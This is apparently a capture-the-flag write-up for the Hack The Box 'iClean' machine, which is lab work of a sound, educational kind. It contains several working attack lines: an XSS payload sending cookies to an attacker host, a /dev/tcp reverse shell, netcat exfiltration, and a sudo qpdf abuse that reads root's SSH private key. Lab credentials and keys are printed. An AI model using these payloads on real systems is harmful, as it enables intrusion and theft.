iClean - Easy - Windows
Nmap scan
Port scan revealed 2 ports of interest. SSH and Apache running on an Ubuntu operating system.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
# Nmap 7.94SVN scan initiated Mon Apr 8 17:55:37 2024 as: nmap -sCV -p- -v -oN portscan.log 10.10.11.12
Nmap scan report for 10.10.11.12
Host is up (0.031s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 2c:f9:07:77:e3:f1:3a:36:db:f2:3b:94:e3:b7:cf:b2 (ECDSA)
|_ 256 4a:91:9f:f2:74:c0:41:81:52:4d:f1:ff:2d:01:78:6b (ED25519)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
| http-methods:
|_ Supported Methods: HEAD GET POST OPTIONS
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Apr 8 17:56:00 2024 -- 1 IP address (1 host up) scanned in 23.12 seconds
Inspecting port 80 (vhost http://capiclean.htb)
When accessing port 80 in the web browser it redirects the request to the vhost capiclean.htb. The hosts file was updated with this entry to make sure it resolves correctly.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
┌──(kali㉿kali)-[~/hackthebox/iclean]
└─$ curl -v 10.10.11.12
* Trying 10.10.11.12:80...
* Connected to 10.10.11.12 (10.10.11.12) port 80
> GET / HTTP/1.1
> Host: 10.10.11.12
> User-Agent: curl/8.5.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Tue, 09 Apr 2024 01:13:55 GMT
< Server: Apache/2.4.52 (Ubuntu)
< Last-Modified: Tue, 05 Sep 2023 16:40:51 GMT
< ETag: "112-6049f4a35f3a4"
< Accept-Ranges: bytes
< Content-Length: 274
< Vary: Accept-Encoding
< Content-Type: text/html
<
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="refresh" content="0;url=http://capiclean.htb">
</head>
<body>
<!-- Optional content for users without JavaScript -->
<p>If you are not redirected, <a href="http://capiclean.htb">click here</a>.</p>
</body>
</html>
* Connection #0 to host 10.10.11.12 left intact
Directory enumeration
Gobuster found a number of endpoints. The vhost is being powered by Werkzug. The dashboard endpoint is most interesting. A valid session is required to access the dashboard.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://capiclean.htb/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/login (Status: 200) [Size: 2106]
/logout (Status: 302) [Size: 189] [--> /]
/about (Status: 200) [Size: 5267]
/services (Status: 200) [Size: 8592]
/. (Status: 200) [Size: 16697]
/dashboard (Status: 302) [Size: 189] [--> /]
/team (Status: 200) [Size: 8109]
/quote (Status: 200) [Size: 2237]
/server-status (Status: 403) [Size: 278]
Login bypass attempts - All failed
NoSQL / Standard SQL injection failed to bypass login page.
Inspecting quote - http://capiclean.htb/quote
There is a web page which allows the user to submit their email address and the service they want via web form. Below is an example of a normal request.
Request
1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST /sendMessage HTTP/1.1
Host: capiclean.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
Origin: http://capiclean.htb
Connection: close
Referer: http://capiclean.htb/quote
Upgrade-Insecure-Requests: 1
service=Carpet+Cleaning&email=test%40test.com
Response (stripped)
1
<p class="ipsum_text">Your quote request was sent to our management team. They will reach out soon via email. Thank you for the interest you have shown in our services.</p>
XSS - http://capiclean.htb/quote
After intercepting the request and testing various payloads it was possible to send a XSS payload within the service parameter. This type of attack is often used to steal cookies. If a valid cookie was returned it may be possible to send it with future requests and gain access to the dashboard.
Payload Example
Below is an example of an XSS payload which sends the cookies of the victim to a web server controlled by the attacker. In this example the cookies are also base64 encoded for data integrity.
1
<img src=x onerror=this.src="http://10.10.14.21/"+btoa(document.cookie)/>
XSS Request
The finalized request in full.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST /sendMessage HTTP/1.1
Host: capiclean.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 63
Origin: http://capiclean.htb
Connection: close
Referer: http://capiclean.htb/quote
Upgrade-Insecure-Requests: 1
service=<img+src%3dx+onerror%3dthis.src%3d"http%3a//10.10.14.21/"%2bbtoa(document.cookie)/>&email=test%40test.com
XSS Response
A simple python web server was used to intercept the request made by the victim. The GET data contains some base64 encoded data which looks promising.
1
2
3
4
5
┌──(kali㉿kali)-[~/hackthebox/iclean]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.12 - - [08/Apr/2024 21:31:50] code 404, message File not found
10.10.11.12 - - [08/Apr/2024 21:31:50] "GET /c2Vzc2lvbj1leUp5YjJ4bElqb2lNakV5TXpKbU1qazNZVFUzWVRWaE56UXpPRGswWVRCbE5HRTRNREZtWXpNaWZRLlpoUVJsdy5oY0pxRHVrOGxjakRiY0dHMy1WWlB4Mkl6OEE= HTTP/1.1" 404 -
Decoding Cookie
Decoding the data revealed a session cookie. The cookie is a JWT which has a role variable. The role variable has a value of an MD5 hash which when reversed equals the string admin.
Convert from base64 to plaintext
1
2
3
┌──(kali㉿kali)-[~/hackthebox/iclean]
└─$ echo c2Vzc2lvbj1leUp5YjJ4bElqb2lNakV5TXpKbU1qazNZVFUzWVRWaE56UXpPRGswWVRCbE5HRTRNREZtWXpNaWZRLlpoUVJsdy5oY0pxRHVrOGxjakRiY0dHMy1WWlB4Mkl6OEE= | base64 -d
session=eyJyb2xlIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMifQ.ZhQRlw.hcJqDuk8lcjDbcGG3-VZPx2Iz8A
JWT Decode
1
2
3
{
"role": "21232f297a57a5a743894a0e4a801fc3"
}
Reverse MD5 value
1
21232f297a57a5a743894a0e4a801fc3 = admin
Accessing Dashboard - http://capiclean.htb/dashboard
Adding the cookie into the browsers storage allowed access to the dashboard. The dashboard has a number of features which have been listed below. After extensive testing with mostly SSTI payloads I could only find one endpoint that was vulnerable.
Dashboard Features
- Generate Invoice - Not vulnerable
- Generate QR - Vulnerable to SSTI
- Edit Services - Not vulnerable
- Quote Requests - Not vulnerable ###
SSTI - Generate QR
The qr_link parameter of this endpoint was vulnerable to SSTI. Below is an example request.
Example Request
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /QRGenerator HTTP/1.1
Host: capiclean.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 118
Origin: http://capiclean.htb
Connection: close
Referer: http://capiclean.htb/QRGenerator
Cookie: session=eyJyb2xlIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMifQ.ZhQRlw.hcJqDuk8lcjDbcGG3-VZPx2Iz8A
Upgrade-Insecure-Requests: 1
invoice_id=&form_type=scannable_invoice&qr_link=
RCE Payload Example
Its possible to obtain RCE using SSTI with various payloads. A lot of the common RCE payloads failed to work due to a blacklist being in place.
Source: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md
1
Modifed Payload
Sleep is good for testing command execution blind. To improve the payload to gain a foothold the below modifications were made. This will reach out to a web server the attacker controls, download a file and pipe the contents of that file to bash. The contents of the file in this case was a reverse shell payload which can be viewed below.
``
Testing Payload
Below is the full request including payload.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /QRGenerator HTTP/1.1
Host: capiclean.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 118
Origin: http://capiclean.htb
Connection: close
Referer: http://capiclean.htb/QRGenerator
Cookie: session=eyJyb2xlIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMifQ.ZhQRlw.hcJqDuk8lcjDbcGG3-VZPx2Iz8A
Upgrade-Insecure-Requests: 1
"invoice_id=&form_type=scannable_invoice&qr_link="
Victim downloads file
1
2
3
4
┌──(kali㉿kali)-[~/hackthebox/iclean]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.12 - - [08/Apr/2024 21:49:58] "GET /shell HTTP/1.1" 200 -
Contents of shell
1
2
3
┌──(kali㉿kali)-[~/hackthebox/iclean]
└─$ cat shell
bash -i >& /dev/tcp/10.10.14.21/8888 0>&1
Reverse Shell obtained as www-data
1
2
3
4
5
6
7
┌──(kali㉿kali)-[~/hackthebox/iclean]
└─$ nc -lvnp 8888
listening on [any] 8888 ...
connect to [10.10.14.21] from (UNKNOWN) [10.10.11.12] 37994
bash: cannot set terminal process group (1219): Inappropriate ioctl for device
bash: no job control in this shell
www-data@iclean:/opt/app$
Enumerating SQL database
The app.py file contained the SQL credentials as seen below.
1
2
3
4
5
6
7
# Database Configuration
db_config = {
'host': '127.0.0.1',
'user': 'iclean',
'password': 'pxCsmnGLckUb',
'database': 'capiclean'
}
Logging into database and extracting hashes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
www-data@iclean:/opt/app$ mysql -u iclean -p
mysql -u iclean -p
Enter password: pxCsmnGLckUb
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 27308
Server version: 8.0.36-0ubuntu0.22.04.1 (Ubuntu)
Copyright (c) 2000, 2024, Oracle and/or its affiliates.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| capiclean |
| information_schema |
| performance_schema |
+--------------------+
3 rows in set (0.00 sec)
mysql> use capiclean;
use capiclean;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
show tables;
+---------------------+
| Tables_in_capiclean |
+---------------------+
| quote_requests |
| services |
| users |
+---------------------+
3 rows in set (0.00 sec)
mysql> select * from users;
select * from users;
+----+----------+------------------------------------------------------------------+----------------------------------+
| id | username | password | role_id |
+----+----------+------------------------------------------------------------------+----------------------------------+
| 1 | admin | 2ae316f10d49222f369139ce899e414e57ed9e339bb75457446f2ba8628a6e51 | 21232f297a57a5a743894a0e4a801fc3 |
| 2 | consuela | 0a298fdd4d546844ae940357b631e40bf2a7847932f82c494daa1c9c5d6927aa | ee11cbb19052e40b07aac0ca060c23ee |
+----+----------+------------------------------------------------------------------+----------------------------------+
2 rows in set (0.01 sec)
mysql>
Cracking Hashes
Hashcat found the password of the consuela user. Rockyou.txt wordlist was used.
1
0a298fdd4d546844ae940357b631e40bf2a7847932f82c494daa1c9c5d6927aa:simple and clean
SSH Access - User consuela
The credentials worked and granted access as the consuela via SSH. User flag captured.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
┌──(kali㉿kali)-[~/hackthebox/iclean]
└─$ ssh consuela@capiclean.htb
consuela@capiclean.htb's password:
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-101-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Tue Apr 9 01:55:43 AM UTC 2024
Expanded Security Maintenance for Applications is not enabled.
3 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
You have mail.
Last login: Mon Apr 8 23:07:37 2024 from 10.10.14.21
consuela@iclean:~$ id
uid=1000(consuela) gid=1000(consuela) groups=1000(consuela)
consuela@iclean:~$ ls -la
total 36
drwxr-x--- 5 consuela consuela 4096 Apr 8 23:28 .
drwxr-xr-x 3 root root 4096 Sep 5 2023 ..
lrwxrwxrwx 1 consuela consuela 9 Sep 5 2023 .bash_history -> /dev/null
-rw-r--r-- 1 consuela consuela 220 Jan 6 2022 .bash_logout
-rw-r--r-- 1 consuela consuela 3771 Jan 6 2022 .bashrc
drwx------ 2 consuela consuela 4096 Mar 2 07:51 .cache
drwx------ 3 consuela consuela 4096 Apr 8 19:57 .gnupg
-rw-r--r-- 1 consuela consuela 807 Jan 6 2022 .profile
drwx------ 2 consuela consuela 4096 Sep 5 2023 .ssh
-rw-r----- 1 root consuela 33 Apr 8 15:46 user.txt
consuela@iclean:~$ cat user.txt
54517b92d5976a76ee4b693994baa3fc
consuela@iclean:~$
Sudo permissions
The user consuela has sudo permissions to execute the qpdf binary as root. Next step will be checking for known vulnerabilities.
1
2
3
4
5
6
7
8
9
consuela@iclean:~$ sudo -l
[sudo] password for consuela:
Matching Defaults entries for consuela on iclean:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User consuela may run the following commands on iclean:
(ALL) /usr/bin/qpdf
QPDF
QPDF is both a software library and a free command-line program that can convert one PDF file to another equivalent PDF file. It is capable of performing transformations such as linearization, encryption, and decryption of PDF files
Version Check
1
2
3
consuela@iclean:~$ sudo qpdf --version
qpdf version 10.6.3
Run qpdf --copyright to see copyright and license information.
CVE Check
Version 10.6.3 has multiple CVE’s due to being outdated. Unfortunately none of them seem to have any value for this situation.
Function Check
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
consuela@iclean:~$ sudo qpdf --help
Run "qpdf --help=topic" for help on a topic.
Run "qpdf --help=--option" for help on an option.
Run "qpdf --help=all" to see all available help.
Topics:
add-attachment: attach (embed) files
advanced-control: tweak qpdf's behavior
attachments: work with embedded files
completion: shell completion
copy-attachments: copy attachments from another file
encryption: create encrypted files
exit-status: meanings of qpdf's exit codes
general: general options
help: information about qpdf
inspection: inspect PDF files
json: JSON output for PDF information
modification: change parts of the PDF
overlay-underlay: overlay/underlay pages from other files
page-ranges: page range syntax
page-selection: select pages from one or more files
pdf-dates: PDF date format
testing: options for testing or debugging
transformation: make structural PDF changes
usage: basic invocation
For detailed help, visit the qpdf manual: https://qpdf.readthedocs.io
Reading Root Files
Since there are no useful CVE’s it may be possible to use the normal function of the program to get root. This is only possible since the program is allowed to run as root therefore it should be albe to read root owned files.
There is an interesting function called add-attachment. After reading the documentation and testing it lead to the below series of commands.
Adding root SSH keys to pdf as attachment
Blindly hoping there is a root SSH key on the machine and trying to attach it to the PDF. No error messages saying the file cannot be found which is a good sign.
1
2
3
consuela@iclean:~$ sudo qpdf --add-attachment /root/.ssh/id_rsa -- sample.pdf outfile.pdf
consuela@iclean:~$ ls
outfile.pdf sample.pdf user.txt
Transferring pdf with netcat
Transferred the file over to my local machine with netcat. After opening the PDF I could not see any attachments. If attempted to grep the contents of the PDF for keywords such as “SSH”, “PRIVATE” or “KEY” it returned a message saying the contents were binary. That message shows there is something there it only needs to be extracted correctly.
1
consuela@iclean:~$ cat outfile.pdf | nc 10.10.14.21 8000
Binwalking PDF to extract text
Binwalk was used to parse the contents of the PDF from binary to plaintext as seen below. I used a fairly large PDF which created a lot of junk output. Using a smaller PDF would have prevented this.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
┌──(kali㉿kali)-[~/hackthebox/iclean]
└─$ binwalk -Me outfile.pdf
Scan Time: 2024-04-08 22:09:04
Target File: /home/kali/hackthebox/iclean/outfile.pdf
MD5 Checksum: 14aa7f63f92e6dd9ea5372cb4d33d048
Signatures: 411
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 PDF document, version: "1.5"
101 0x65 Zlib compressed data, default compression
2558 0x9FE Zlib compressed data, default compression
3717 0xE85 Zlib compressed data, best compression
10668 0x29AC Zlib compressed data, best compression
17624 0x44D8 Zlib compressed data, best compression
27371 0x6AEB Zlib compressed data, best compression
34368 0x8640 Zlib compressed data, best compression
41330 0xA172 Zlib compressed data, best compression
53609 0xD169 Zlib compressed data, best compression
74077 0x1215D Zlib compressed data, best compression
91374 0x164EE Zlib compressed data, best compression
91781 0x16685 Zlib compressed data, best compression
92408 0x168F8 Zlib compressed data, best compression
92820 0x16A94 Zlib compressed data, best compression
93451 0x16D0B Zlib compressed data, best compression
93829 0x16E85 Zlib compressed data, best compression
94445 0x170ED Zlib compressed data, best compression
94859 0x1728B Zlib compressed data, best compression
95491 0x17503 Zlib compressed data, best compression
95878 0x17686 Zlib compressed data, best compression
96502 0x178F6 Zlib compressed data, best compression
96878 0x17A6E Zlib compressed data, best compression
97502 0x17CDE Zlib compressed data, best compression
97913 0x17E79 Zlib compressed data, best compression
98548 0x180F4 Zlib compressed data, best compression
98925 0x1826D Zlib compressed data, best compression
99542 0x184D6 Zlib compressed data, best compression
99956 0x18674 Zlib compressed data, best compression
100587 0x188EB Zlib compressed data, best compression
100962 0x18A62 Zlib compressed data, best compression
101578 0x18CCA Zlib compressed data, best compression
101953 0x18E41 Zlib compressed data, best compression
102569 0x190A9 Zlib compressed data, best compression
102984 0x19248 Zlib compressed data, best compression
103616 0x194C0 Zlib compressed data, best compression
104024 0x19658 Zlib compressed data, best compression
104652 0x198CC Zlib compressed data, best compression
105071 0x19A6F Zlib compressed data, best compression
105712 0x19CF0 Zlib compressed data, best compression
106086 0x19E66 Zlib compressed data, best compression
106701 0x1A0CD Zlib compressed data, best compression
107109 0x1A265 Zlib compressed data, best compression
107738 0x1A4DA Zlib compressed data, best compression
108114 0x1A652 Zlib compressed data, best compression
108732 0x1A8BC Zlib compressed data, best compression
109106 0x1AA32 Zlib compressed data, best compression
109720 0x1AC98 Zlib compressed data, best compression
110132 0x1AE34 Zlib compressed data, best compression
110762 0x1B0AA Zlib compressed data, best compression
111139 0x1B223 Zlib compressed data, best compression
111755 0x1B48B Zlib compressed data, best compression
112131 0x1B603 Zlib compressed data, best compression
112747 0x1B86B Zlib compressed data, best compression
113121 0x1B9E1 Zlib compressed data, best compression
113734 0x1BC46 Zlib compressed data, best compression
114117 0x1BDC5 Zlib compressed data, best compression
114738 0x1C032 Zlib compressed data, best compression
115113 0x1C1A9 Zlib compressed data, best compression
115977 0x1C509 Zlib compressed data, default compression
116607 0x1C77F Zlib compressed data, default compression
Binwalk - Output
The total output of the extraction. Lots of junk due to file size of PDF used.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(kali㉿kali)-[~/hackthebox/iclean/_outfile.pdf.extracted]
└─$ ls
1215D 170ED.zlib 180F4 18E41.zlib 19E66 1AC98.zlib 1BC46 44D8.zlib
1215D.zlib 1728B 180F4.zlib 190A9 19E66.zlib 1AE34 1BC46.zlib 65
164EE 1728B.zlib 1826D 190A9.zlib 1A0CD 1AE34.zlib 1BDC5 65.zlib
164EE.zlib 17503 1826D.zlib 19248 1A0CD.zlib 1B0AA 1BDC5.zlib 6AEB
16685 17503.zlib 184D6 19248.zlib 1A265 1B0AA.zlib 1C032 6AEB.zlib
16685.zlib 17686 184D6.zlib 194C0 1A265.zlib 1B223 1C032.zlib 8640
168F8 17686.zlib 18674 194C0.zlib 1A4DA 1B223.zlib 1C1A9 8640.zlib
168F8.zlib 178F6 18674.zlib 19658 1A4DA.zlib 1B48B 1C1A9.zlib 9FE
16A94 178F6.zlib 188EB 19658.zlib 1A652 1B48B.zlib 1C509 9FE.zlib
16A94.zlib 17A6E 188EB.zlib 198CC 1A652.zlib 1B603 1C509.zlib A172
16D0B 17A6E.zlib 18A62 198CC.zlib 1A8BC 1B603.zlib 1C77F A172.zlib
16D0B.zlib 17CDE 18A62.zlib 19A6F 1A8BC.zlib 1B86B 1C77F.zlib D169
16E85 17CDE.zlib 18CCA 19A6F.zlib 1AA32 1B86B.zlib 29AC D169.zlib
16E85.zlib 17E79 18CCA.zlib 19CF0 1AA32.zlib 1B9E1 29AC.zlib E85
170ED 17E79.zlib 18E41 19CF0.zlib 1AC98 1B9E1.zlib 44D8 E85.zlib
Filtering Output
A simple grep should be able to highlight the file of interest. As seen below it found SSH within the ‘1C509’ file.
1
2
3
4
┌──(kali㉿kali)-[~/hackthebox/iclean/_outfile.pdf.extracted]
└─$ grep -Ri SSH
1C509:-----BEGIN OPENSSH PRIVATE KEY-----
1C509:-----END OPENSSH PRIVATE KEY-----
Reading root SSH key
It worked. The key can be seen below in full.
1
2
3
4
5
6
7
8
9
10
11
┌──(kali㉿kali)-[~/hackthebox/iclean/_outfile.pdf.extracted]
└─$ cat 1C509
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAaAAAABNlY2RzYS
1zaGEyLW5pc3RwMjU2AAAACG5pc3RwMjU2AAAAQQQMb6Wn/o1SBLJUpiVfUaxWHAE64hBN
vX1ZjgJ9wc9nfjEqFS+jAtTyEljTqB+DjJLtRfP4N40SdoZ9yvekRQDRAAAAqGOKt0ljir
dJAAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAxvpaf+jVIEslSm
JV9RrFYcATriEE29fVmOAn3Bz2d+MSoVL6MC1PISWNOoH4OMku1F8/g3jRJ2hn3K96RFAN
EAAAAgK2QvEb+leR18iSesuyvCZCW1mI+YDL7sqwb+XMiIE/4AAAALcm9vdEBpY2xlYW4B
AgMEBQ==
-----END OPENSSH PRIVATE KEY-----
Root access obtained
The private key allowed root access to the machine via SSH. Root flag captured.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
┌──(kali㉿kali)-[~/hackthebox/iclean]
└─$ ssh root@capiclean.htb -i root.key
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-101-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Tue Apr 9 02:12:46 AM UTC 2024
Expanded Security Maintenance for Applications is not enabled.
3 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
Last login: Mon Apr 8 23:27:18 2024 from 10.10.14.21
root@iclean:~# id
uid=0(root) gid=0(root) groups=0(root)
root@iclean:~# cat root.txt
b1b81b9f77eba3b9be30095cdfba6c4c
root@iclean:~#